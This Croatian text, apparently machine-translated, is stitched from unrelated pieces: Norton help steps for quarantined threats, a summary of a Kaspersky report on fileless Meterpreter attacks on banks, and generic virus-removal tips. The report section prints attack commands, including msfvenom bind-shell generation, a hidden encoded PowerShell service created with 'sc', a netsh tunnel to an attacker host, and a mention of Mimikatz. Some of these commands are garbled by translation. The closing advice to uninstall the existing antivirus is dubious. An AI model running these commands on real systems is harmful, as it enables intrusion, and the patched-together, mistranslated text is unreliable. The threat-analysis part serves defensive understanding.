Kada Norton otkrije prijetnju, program je automatski uklanja, osim ako je potrebna vaša intervencija da biste utvrdili kako se nositi s prijetnjom. U takvim slučajevima Norton prikazuje obavijest "Otkrivene prijetnje" ili "Sigurnosna prijetnja" s dostupnim opcijama za odgovor na prijetnju.
Pogledajte prijetnje koje su automatski uklonjene tijekom skeniranja
Pokrenite Norton.
Sigurnost uređaja, kliknite Otvori.
U prozoru Sigurnosni dnevnik Sigurnosne prijetnje riješene.
Odaberite prijetnju s popisa i pogledajte poduzete radnje u oknu s detaljima.
U nekim slučajevima, umjesto automatskog rješavanja prijetnje, Norton preporučuje da poduzmete određenu radnju kako biste je riješili.
Popravljanje prijetnji koje nisu uklonjene tijekom skeniranja
Pokrenite Norton.
Ako se prozor My Norton pojavi pored Sigurnost uređaja, kliknite Otvori.
U glavnom prozoru Nortona dvaput kliknite Sigurnost, a zatim odaberite Dnevnik.
U prozoru Sigurnosni dnevnik na popisu Prikaži odaberite Neriješene sigurnosne prijetnje.
Ako popis sadrži neriješene prijetnje, odaberite prijetnju koja vas zanima.
Ako imate razloga vjerovati da je vaš sustav zaražen, pokrenite Norton Power Eraser. Norton Power Eraser snažan je alat za uklanjanje zlonamjernog softvera koji se rješava najotpornijih sigurnosnih prijetnji. Za više informacija pogledajte Pokrenite Norton Threat Scan na računalu
Norton Power Eraser je agresivan alat za uklanjanje zlonamjernog softvera. Ponekad Norton Power Eraser može ukloniti legitimne datoteke zajedno sa zlonamjernim softverom, stoga pažljivo pregledajte rezultate skeniranja prije brisanja datoteka.
Norton prema zadanim postavkama uklanja sigurnosne prijetnje s vašeg računala i stavlja ih u karantenu. Ako imate razloga vjerovati da je datoteka izbrisana pogreškom, možete je vratiti iz karantene na izvornu lokaciju i isključiti iz naknadnih skeniranja.
Vraćanje datoteke iz karantene
Pokrenite Norton.
Ako se prozor My Norton pojavi pored Sigurnost uređaja, kliknite Otvori.
U glavnom Norton prozoru kliknite Sigurnost, a zatim odaberite Dnevnik.
U prozoru Sigurnosni dnevnik Proširite izbornik Prikaži i odaberite opciju Karantena.
Odaberite datoteku koju želite vratiti.
U oknu s pojedinostima kliknite Mogućnosti.
U prozoru Opasnost otkrivena odaberite tim Oporavite i isključite ovu datoteku.
U prozoru Oporavak od karantene Pritisnite gumb Da.
U prozoru Browse for Folder odaberite mapu ili pogon za smještaj oporavljene datoteke i kliknite OK.
o novoj, zanimljivoj zlonamjernoj kampanji koja je zahvatila banke, telekome, državne agencije, ali i druge tvrtke i organizacije u više od četrdeset zemalja svijeta.
Analitičari tima GReAT pišu da je sigurnosni tim za bankarstvo prvi primijetio prijetnju: tada je kod Meterpretera pronađen u fizičkoj memoriji kontrolera domene. Kaspersky Lab proizvodi prepoznaju probleme kao što su MEM:Trojan.Win32.Cometer i MEM:Trojan.Win32.Metasploit. Kako su analitičari kopali dublje, pokušavajući shvatiti odakle dolazi kod u memoriji, također su otkrili PowerShell skripte u registru Windowsa i NETSH uslužni program koji je korišten za tuneliranje prometa do kontrolnog poslužitelja napadača.
Takvi se napadi nazivaju "bez datoteka", što znači da zlonamjerni softver ne smješta datoteke na tvrdi disk; umjesto toga, sadržaj se ubacuje izravno u memoriju i nalazi se unutar RAM-a. Naravno, takav je napad izuzetno teško otkriti i pratiti.
Obrazac napada
Istraživači objašnjavaju da se dobro poznati okvir Metasploit može koristiti za izradu skripti poput primjera u nastavku.
Takve skripte pomažu u ubacivanju Meterpretera u RAM. Msfvenom iz Metasploita može se koristiti za njihovo generiranje:
Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
Nakon što se skripta generira, napadači koriste Windows SC za instaliranje zlonamjerne usluge na ciljno računalo (koja će u konačnici izvršiti gornju skriptu). To se može učiniti, na primjer, pomoću sljedeće naredbe:
sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA...” start= priručnik
Sljedeći korak je konfiguriranje tuneliranja tako da zaraženi stroj postane dostupan udaljenom hostu. Da bi to učinili, napadači pribjegavaju sljedećoj naredbi:
netsh sučelje portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
Kao rezultat toga, sav mrežni promet od 10.10.1.11:4444 bit će preusmjeren na 10.10.1.12:8080. Ova tehnika vam omogućuje da instalirate proxy tunel, uz pomoć kojeg kriminalci mogu daljinski kontrolirati host zaražen PowerShell-om.
Analitičari primjećuju da korištenje SC i NETSH zahtijeva administratorske ovlasti na lokalnom i udaljenom računalu. Korištenje zlonamjernih PowerShell skripti također će zahtijevati eskalaciju privilegija i promjene u politici izvršavanja. Kako bi to učinili, napadači pribjegavaju korištenju Mimikatz credential dumpera, prikupljajući lozinke s računa na lokalnom računalu i okolnim radnim stanicama.
Pažljivo proučavajući napad na jednu od pogođenih banaka, istraživači su došli do zaključka da su operateri ove kampanje koristili domene treće razine, kao i domene u zonama .GA, .ML, .CF. Činjenica je da su takve domene besplatne, što znači da napadači ne ostavljaju za sobom WHOIS podatke.
Rezimirajući sve navedeno (korištenje Metasploita i standardnih Windows uslužnih programa, domene bez WHOIS informacija), istraživači zaključuju da je rukopis nepoznatih napadača vrlo sličan radu grupa kao što su GCMAN i Carbanak. Međutim, nema izravnih dokaza, tako da nije moguće povezati te tihe napade s nekom specifičnom skupinom.
“Tehnike poput onih opisanih u ovom izvješću postaju sve češće, osobito [kada se provode napadi] protiv velikih ciljeva u bankarskoj industriji. Nažalost, korištenje jednostavnih alata, u kombinaciji s raznim trikovima, čini otkrivanje [takvih napada] iznimno teškim”, rezimiraju stručnjaci GReAT-a.
Virus u RAM-u prilično je neugodan fenomen i, nažalost, nije neuobičajen. vrlo često vidimo skrivenu datoteku, ali je ne možemo izbrisati ni na koji način - stalno se pojavljuje i pojavljuje ili nam sam Windows operativni sustav to ne dopušta.
Usput, manifestira se mnogo češće u slučajevima netočnih antivirusnih postavki ili odsutnosti istih. Ako imate takvu situaciju, preporučujem da pročitate članak - instaliranje i konfiguriranje antivirusnog programa u sustavu Windows. Prije nego što uklonite virus iz RAM-a, vrijedi razumjeti što se događa s antivirusnim programom instaliranim na vašem računalu. Najvjerojatnije je vaš antivirusni program "uništio" virus u nastajanju. Također je moguće da u arsenalu potpisa vašeg antivirusnog programa ne postoji metoda za potpuno brisanje virusa iz pravodobne zbirke i program samo pokušava ukloniti virusne infekcija, a ne sam virus.
Često se događaju situacije kada virus prenosi programe i dodatne datoteke za svoj rad, ili automatski počinje raditi, ali sada će antivirusni program detektirati te kopije, ali neće detektirati sam izvorni kod (virus) i u većini slučajeva ne može nositi se s tim.
- Uklanjamo (pomoću programa za deinstalaciju - dodaj/ukloni programe) instalirani antivirusni program, on ovdje nema koristi.
- Skinite CCleaner s interneta i instalirajte ga. Počnimo, prvo očistite privremene mape. Ovaj softver je prikladan za obične korisnike, tako da je moguće označiti sve kvadratiće u postavkama - neće izbrisati korisničke podatke! Više o programu napisao sam u članku - čišćenje registra.
- Tada će nam trebati uslužni program za čišćenje virusa koji će nam pomoći. O njima sam pisao u članku - besplatni uslužni programi za uklanjanje virusa. Biramo bilo koju. Na primjer, skinite s interneta program Dr.web Cure it i instalirajte ga.
- Instalirajte ažuriranje i pokrenite jedno od dva skeniranja (brzo ili potpuno). Brzo skeniranje daje, u načelu, učinkovit rezultat. Uklanjamo sve otkrivene viruse. Ponovno pokrenite računalo.
- Preuzmite novi antivirusni program. Temeljno važno! Ako ste prije problema imali instaliran antivirus Eset NOD32 antivirus, onda instalirajte Avast ili Aviru, ako je instaliran Avast, instalirajte Eset ili neki drugi antivirusni program po vašem izboru.
- Lako je protumačiti takve radnje, antivirusni program koji ste imali je najvjerojatnije oštećen, podaci u registru bi mogli ostati, a to će dovesti do netočnog rada antivirusnog programa, pogotovo jer ovaj antivirusni program nije pronašao prijetnje s interneta na vašem računalu.